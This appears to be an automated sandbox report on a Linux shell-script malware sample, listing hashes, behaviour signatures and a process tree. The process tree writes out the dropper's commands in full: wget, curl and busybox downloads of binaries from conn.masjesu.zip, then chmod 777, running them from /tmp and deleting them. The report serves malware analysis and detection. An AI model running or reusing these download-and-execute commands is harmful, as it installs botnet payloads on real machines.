Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh
-
Size
10KB
-
MD5
a1329951e2eba09d1222076e3dd4b047
-
SHA1
ab745d5eeb288f4b11eb212ecc7ca42d3de79e92
-
SHA256
ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac
-
SHA512
fd0e9356a3b477d8e50ecf95446d00e3f0829e1189c56f6592087be740ef52ec0048ba14cbd86b021a7bd793a2364011c811504a66eda3f14968a546fb7c89ab
-
SSDEEP
192:cVUINuG7Uo9GmNNMuUJmHXeVlhrHXeVlhcxUINuGpUo9GmT:qUINuG7Uo9GmNNMuUJNUINuGpUo9GmT
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 chmod 748 chmod 882 chmod 798 chmod 814 chmod 821 chmod 896 chmod 938 chmod 966 chmod 987 chmod 1001 chmod 875 chmod 910 chmod 945 chmod 952 chmod 980 chmod 734 chmod 771 chmod 973 chmod 994 chmod 868 chmod 842 chmod 889 chmod 924 chmod 931 chmod 959 chmod 903 chmod 917 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 735 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 742 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 749 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 772 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 800 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 815 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 822 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 844 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 869 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 876 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 883 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 890 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 897 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 904 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 911 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 918 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 925 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 932 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 939 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 946 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 953 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 960 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 967 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 974 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 981 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 988 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 995 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 1002 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 955 wget 965 busybox 944 busybox 949 curl 878 wget 879 curl 881 busybox 886 curl 993 busybox 1000 busybox 744 wget 791 busybox 909 busybox 913 wget 724 curl 899 wget 930 busybox 991 curl 738 curl 902 busybox 942 curl 990 wget 825 curl 836 busybox 859 curl 977 curl 983 wget 986 busybox 732 busybox 820 busybox 751 wget 867 busybox 916 busybox 928 curl 963 curl 997 wget 710 wget 745 curl 888 busybox 892 wget 893 curl 969 wget 970 curl 979 busybox 767 busybox 824 wget 848 wget 927 wget 998 curl 756 curl 811 curl 776 wget 813 busybox 874 busybox 921 curl 934 wget 958 busybox 740 busybox 747 busybox 948 wget 951 busybox 972 busybox 976 wget 783 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl
Processes
-
/tmp/ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh/tmp/ca6f6dd0b35e3185039cfaea57b698bb3420ac16e537baa554611d42f71995ac.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:710
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- System Network Configuration Discovery
PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:751
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:767
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:775
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:776
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:805
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:816
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:817
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- System Network Configuration Discovery
PID:820
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:881
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:895
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:923
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
